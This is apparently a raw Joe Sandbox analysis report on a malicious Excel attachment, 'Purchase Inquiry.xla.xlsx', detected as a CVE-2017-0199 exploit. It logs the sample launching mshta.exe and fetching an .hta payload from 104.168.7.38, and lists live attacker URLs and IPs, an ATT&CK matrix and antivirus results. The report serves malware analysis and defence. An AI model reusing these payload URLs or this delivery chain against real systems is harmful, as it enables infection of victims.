Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.10:49706 -> 13.107.246.67:443
Source: global trafficHTTP traffic detected: GET /HhPRgN?&pot=fanatical&buckle=innate&gazelle HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoHost: arnogo.netConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /0g9CmGVAcw?&fixture=numerous&airline=rich&fen=efficient&january HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoConnection: Keep-AliveHost: link.saja.market
Source: global trafficHTTP traffic detected: GET /xampp/kscc/scc/everynicepersonwalkingentireplacesgoodformegreat.hta HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoConnection: Keep-AliveHost: 104.168.7.38
Source: unknownTCP traffic detected without corresponding DNS query: 104.168.7.38
Source: unknownTCP traffic detected without corresponding DNS query: 104.168.7.38
Source: unknownTCP traffic detected without corresponding DNS query: 104.168.7.38
Source: unknownTCP traffic detected without corresponding DNS query: 104.168.7.38
Source: unknownTCP traffic detected without corresponding DNS query: 104.168.7.38
Source: unknownTCP traffic detected without corresponding DNS query: 104.168.7.38
Source: unknownTCP traffic detected without corresponding DNS query: 104.168.7.38
Source: unknownTCP traffic detected without corresponding DNS query: 104.168.7.38
Source: unknownTCP traffic detected without corresponding DNS query: 104.168.7.38
Source: unknownTCP traffic detected without corresponding DNS query: 104.168.7.38
Source: unknownTCP traffic detected without corresponding DNS query: 104.168.7.38
Source: unknownTCP traffic detected without corresponding DNS query: 104.168.7.38
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global trafficHTTP traffic detected: GET /HhPRgN?&pot=fanatical&buckle=innate&gazelle HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoHost: arnogo.netConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /0g9CmGVAcw?&fixture=numerous&airline=rich&fen=efficient&january HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoConnection: Keep-AliveHost: link.saja.market
Source: global trafficHTTP traffic detected: GET /rules/excel.exe-Production-v19.bundle HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; Microsoft Excel 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
Source: global trafficHTTP traffic detected: GET /rules/rule120603v8s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; Microsoft Excel 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
Source: global trafficHTTP traffic detected: GET /rules/rule120607v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; Microsoft Excel 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
Source: global trafficHTTP traffic detected: GET /xampp/kscc/scc/everynicepersonwalkingentireplacesgoodformegreat.hta HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoConnection: Keep-AliveHost: 104.168.7.38
Source: global trafficDNS traffic detected: DNS query: arnogo.net
Source: global trafficDNS traffic detected: DNS query: link.saja.market
Source: global trafficDNS traffic detected: DNS query: otelrules.svc.static.microsoft
Source: Purchase Inquiry.xla.xlsxString found in binary or memory: https://arnogo.net/HhPRgN?&pot=fanatical&buckle=innate&gazelleG
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49700
Source: unknownNetwork traffic detected: HTTP traffic on port 49706 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49707 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49705 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49702 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49700 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49707
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49706
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49705
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49702
Source: unknownHTTPS traffic detected: 104.21.68.120:443 -> 192.168.2.10:49700 version: TLS 1.2
Source: unknownHTTPS traffic detected: 3.39.89.152:443 -> 192.168.2.10:49702 version: TLS 1.2
Source: unknownHTTPS traffic detected: 13.107.246.67:443 -> 192.168.2.10:49705 version: TLS 1.2
Source: Purchase Inquiry.xla.xlsxOLE indicator, VBA macros: true
Source: Purchase Inquiry.xla.xlsxStream path 'MBD0034E513/\x1Ole' : https://arnogo.net/HhPRgN?&pot=fanatical&buckle=innate&gazelleGR<P(]H<T2<.1v8u[RZl_g?6n)`j1U=TWhhWgFCLWT'nua;AUaeYiZo1C2$Rc2QNxFVHn?#[jFf]isbJa304MycVmH8uefZvzOKLdRIqGgn8lPuNiJF6hcRXM1HTpoGqKSFYuL8ErI4Nk9kDfc4h1t4CNA7yGR863FtL6pWyh7u1HCcNa5,G`7VR]n
Source: C:\Windows\SysWOW64\mshta.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXEJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXEJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEWindow title found: microsoft excel okexcel cannot open the file 'purchase inquiry.xla.xlsx' because the file format or file extension is not valid. verify that the file has not been corrupted and that the file extension matches the format of the file.
Source: classification engineClassification label: mal64.expl.winXLSX@6/4@3/4
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEFile created: C:\Program Files (x86)\Microsoft Office\root\vfs\Common AppData\Microsoft\Office\Heartbeat\HeartbeatCache.xmlJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEFile created: C:\Users\user\Desktop\~$Purchase Inquiry.xla.xlsxJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Temp\{C32A347B-B9A1-48DB-B751-2B202BD2159D} - OProcSessId.datJump to behavior
Source: Purchase Inquiry.xla.xlsxOLE indicator, Workbook stream: true
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEFile read: C:\Users\desktop.iniJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
Source: Purchase Inquiry.xla.xlsxVirustotal: Detection: 26%
Source: Purchase Inquiry.xla.xlsxReversingLabs: Detection: 39%
Source: unknownProcess created: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE "C:\Program Files (x86)\Microsoft Office\Root\Office16\EXCEL.EXE" /automation -Embedding
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess created: C:\Windows\SysWOW64\mshta.exe C:\Windows\SysWOW64\mshta.exe -Embedding
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess created: C:\Windows\splwow64.exe C:\Windows\splwow64.exe 12288
Source: unknownProcess created: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE "C:\Program Files (x86)\Microsoft Office\Root\Office16\EXCEL.EXE" "C:\Users\user\Desktop\Purchase Inquiry.xla.xlsx"
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess created: C:\Windows\SysWOW64\mshta.exe C:\Windows\SysWOW64\mshta.exe -EmbeddingJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess created: C:\Windows\splwow64.exe C:\Windows\splwow64.exe 12288Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: c2r32.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: userenv.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: iertutil.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: wldp.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: mshtml.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: powrprof.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: winhttp.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: wkscli.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: netutils.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: umpdc.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: cryptbase.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: urlmon.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: srvcli.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: msiso.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{3EE60F5C-9BAD-4CD8-8E21-AD2D001D06EB}\InprocServer32Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEAutomated click: OK
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEAutomated click: OK
Source: Window RecorderWindow detected: More than 3 window changes detected
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\CommonJump to behavior
Source: Purchase Inquiry.xla.xlsxStatic file information: File size 1308160 > 1048576
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEFile opened: C:\Program Files (x86)\Microsoft Office\root\vfs\SystemX86\MSVCR100.dllJump to behavior
Source: Purchase Inquiry.xla.xlsxInitial sample: OLE indicators encrypted = True
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: Purchase Inquiry.xla.xlsxStream path 'MBD0034E512/Package' entropy: 7.99602638736 (max. 8.0)
Source: Purchase Inquiry.xla.xlsxStream path 'Workbook' entropy: 7.97151586486 (max. 8.0)
Source: C:\Windows\splwow64.exeWindow / User API: threadDelayed 814Jump to behavior
Source: C:\Windows\splwow64.exeLast function: Thread delayed
Source: C:\Windows\splwow64.exeLast function: Thread delayed
Source: C:\Windows\splwow64.exeThread delayed: delay time: 120000Jump to behavior
Source: C:\Windows\splwow64.exeThread delayed: delay time: 120000Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information queried: ProcessInformationJump to behavior
ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
Gather Victim Identity Information1
Scripting
Valid Accounts13
Exploitation for Client Execution
1
Scripting
1
Process Injection
2
Masquerading
OS Credential Dumping1
Process Discovery
Remote Services1
Email Collection
1
Encrypted Channel
Exfiltration Over Other Network MediumAbuse Accessibility Features
CredentialsDomainsDefault AccountsScheduled Task/Job1
DLL Side-Loading
1
DLL Side-Loading
1
Virtualization/Sandbox Evasion
LSASS Memory1
Virtualization/Sandbox Evasion
Remote Desktop ProtocolData from Removable Media1
Ingress Tool Transfer
Exfiltration Over BluetoothNetwork Denial of Service
Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)1
Process Injection
Security Account Manager1
Application Window Discovery
SMB/Windows Admin SharesData from Network Shared Drive2
Non-Application Layer Protocol
Automated ExfiltrationData Encrypted for Impact
Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook1
Obfuscated Files or Information
NTDS1
File and Directory Discovery
Distributed Component Object ModelInput Capture13
Application Layer Protocol
Traffic DuplicationData Destruction
Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
DLL Side-Loading
LSA Secrets2
System Information Discovery
SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet

This section contains all screenshots as thumbnails, including those not shown in the slideshow.


windows-stand
SourceDetectionScannerLabelLink
Purchase Inquiry.xla.xlsx27%VirustotalBrowse
Purchase Inquiry.xla.xlsx39%ReversingLabsDocument-Excel.Exploit.CVE-2017-0199
Purchase Inquiry.xla.xlsx100%AviraW97M/AVI.Agent.pzjmn
No Antivirus matches
No Antivirus matches
No Antivirus matches
SourceDetectionScannerLabelLink
https://link.saja.market/0g9CmGVAcw?&fixture=numerous&airline=rich&fen=efficient&january0%Avira URL Cloudsafe
https://arnogo.net/HhPRgN?&pot=fanatical&buckle=innate&gazelleG0%Avira URL Cloudsafe
https://arnogo.net/HhPRgN?&pot=fanatical&buckle=innate&gazelle0%Avira URL Cloudsafe
NameIPActiveMaliciousAntivirus DetectionReputation
bg.microsoft.map.fastly.net
199.232.214.172
truefalse
    high
    arnogo.net
    104.21.68.120
    truefalse
      unknown
      s-0005.dual-s-msedge.net
      52.123.128.14
      truefalse
        high
        s-part-0039.t-0009.t-msedge.net
        13.107.246.67
        truefalse
          high
          service-eks-nlb-public-0b7cb0a32741e125.elb.ap-northeast-2.amazonaws.com
          3.39.89.152
          truefalse
            high
            otelrules.svc.static.microsoft
            unknown
            unknownfalse
              high
              link.saja.market
              unknown
              unknownfalse
                high
                NameMaliciousAntivirus DetectionReputation
                https://otelrules.svc.static.microsoft/rules/excel.exe-Production-v19.bundlefalse
                  high
                  https://link.saja.market/0g9CmGVAcw?&fixture=numerous&airline=rich&fen=efficient&januaryfalse
                  • Avira URL Cloud: safe
                  unknown
                  https://otelrules.svc.static.microsoft/rules/rule120607v1s19.xmlfalse
                    high
                    https://otelrules.svc.static.microsoft/rules/rule120603v8s19.xmlfalse
                      high
                      https://arnogo.net/HhPRgN?&pot=fanatical&buckle=innate&gazellefalse
                      • Avira URL Cloud: safe
                      unknown
                      NameSourceMaliciousAntivirus DetectionReputation
                      https://arnogo.net/HhPRgN?&pot=fanatical&buckle=innate&gazelleGPurchase Inquiry.xla.xlsxfalse
                      • Avira URL Cloud: safe
                      unknown
                      • No. of IPs < 25%
                      • 25% < No. of IPs < 50%
                      • 50% < No. of IPs < 75%
                      • 75% < No. of IPs
                      IPDomainCountryFlagASNASN NameMalicious
                      3.39.89.152
                      service-eks-nlb-public-0b7cb0a32741e125.elb.ap-northeast-2.amazonaws.comUnited States
                      8987AMAZONEXPANSIONGBfalse
                      104.168.7.38
                      unknownUnited States
                      36352AS-COLOCROSSINGUSfalse
                      13.107.246.67
                      s-part-0039.t-0009.t-msedge.netUnited States
                      8068MICROSOFT-CORP-MSN-AS-BLOCKUSfalse
                      104.21.68.120
                      arnogo.netUnited States
                      13335CLOUDFLARENETUSfalse
                      Joe Sandbox version:42.0.0 Malachite
                      Analysis ID:1636398
                      Start date and time:2025-03-12 18:28:16 +01:00
                      Joe Sandbox product:CloudBasic
                      Overall analysis duration:0h 6m 20s
                      Hypervisor based Inspection enabled:false
                      Report type:full
                      Cookbook file name:defaultwindowsofficecookbook.jbs
                      Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                      Number of analysed new started processes analysed:21
                      Number of new started drivers analysed:0
                      Number of existing processes analysed:0
                      Number of existing drivers analysed:0
                      Number of injected processes analysed:0
                      Technologies:
                      • HCA enabled
                      • EGA enabled
                      • AMSI enabled
                      Analysis Mode:default
                      Analysis stop reason:Timeout
                      Sample name:Purchase Inquiry.xla.xlsx
                      Detection:MAL
                      Classification:mal64.expl.winXLSX@6/4@3/4
                      EGA Information:Failed
                      HCA Information:
                      • Successful, ratio: 100%
                      • Number of executed functions: 0
                      • Number of non-executed functions: 0
                      Cookbook Comments:
                      • Found application associated with file extension: .xlsx
                      • Found Word or Excel or PowerPoint or XPS Viewer
                      • Attach to Office via COM
                      • Active ActiveX Object
                      • Active ActiveX Object
                      • Scroll down
                      • Close Viewer
                      • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, sppsvc.exe, WMIADAP.exe, SIHClient.exe, Sgrmuserer.exe, backgroundTaskHost.exe, conhost.exe, svchost.exe, MavInject32.exe
                      • Excluded IPs from analysis (whitelisted): 52.109.28.46, 23.60.203.209, 52.109.68.129, 199.232.214.172, 104.208.16.95, 104.208.16.88, 52.168.112.66, 52.123.128.14, 2.23.227.208, 172.202.163.200, 40.126.31.2, 2.19.96.83
                      • Excluded domains from analysis (whitelisted): slscr.update.microsoft.com, onedscolprdcus20.centralus.cloudapp.azure.com, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, e16604.dscf.akamaiedge.net, eur.roaming1.live.com.akadns.net, mobile.events.data.microsoft.com, roaming.officeapps.live.com, dual-s-0005-office.config.skype.com, login.live.com, frc-azsc-000.roaming.officeapps.live.com, officeclient.microsoft.com, prod.fs.microsoft.com.akadns.net, c.pki.goog, wu-b-net.trafficmanager.net, www.bing.com, ecs.office.com, self-events-data.trafficmanager.net, fs.microsoft.com, ctldl.windowsupdate.com.delivery.microsoft.com, prod.configsvc1.live.com.akadns.net, self.events.data.microsoft.com, osiprod-frc-buff-azsc-000.francecentral.cloudapp.azure.com, onedscolprdeus01.eastus.cloudapp.azure.com, ctldl.windowsupdate.com, prod.roaming1.live.com.akadns.net, onedscolprdcus08.centralus.cloudapp.azure.com, fe3cr.delivery.mp.microsoft.com, config.officeapps.live.com, ecs.o
                      • Not all processes where analyzed, report is missing behavior information
                      • Report size getting too big, too many NtCreateKey calls found.
                      • Report size getting too big, too many NtQueryAttributesFile calls found.
                      • Report size getting too big, too many NtQueryValueKey calls found.
                      • Report size getting too big, too many NtReadVirtualMemory calls found.
                      • Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                      • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                      TimeTypeDescription
                      13:30:33API Interceptor852x Sleep call for process: splwow64.exe modified
                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                      3.39.89.152SecuriteInfo.com.Exploit.CVE-2017-0199.05.Gen.17087.14702.xlsxGet hashmaliciousUnknownBrowse
                        SecuriteInfo.com.Exploit.CVE-2017-0199.05.Gen.17087.14702.xlsxGet hashmaliciousUnknownBrowse
                          Purchase Inquiry.xla.xlsxGet hashmaliciousUnknownBrowse
                            Bozza nuovo ordine 0010979742.xlsGet hashmaliciousUnknownBrowse
                              Bozza nuovo ordine 0010979742.xlsGet hashmaliciousUnknownBrowse
                                Ref PO24777.xlsGet hashmaliciousUnknownBrowse
                                  Ref PO24777.xlsGet hashmaliciousUnknownBrowse
                                    COTA#U00c7#U00c3O.xlsGet hashmaliciousUnknownBrowse
                                      Order_Mar25.xlsGet hashmaliciousUnknownBrowse
                                        COTA#U00c7#U00c3O.xlsGet hashmaliciousUnknownBrowse
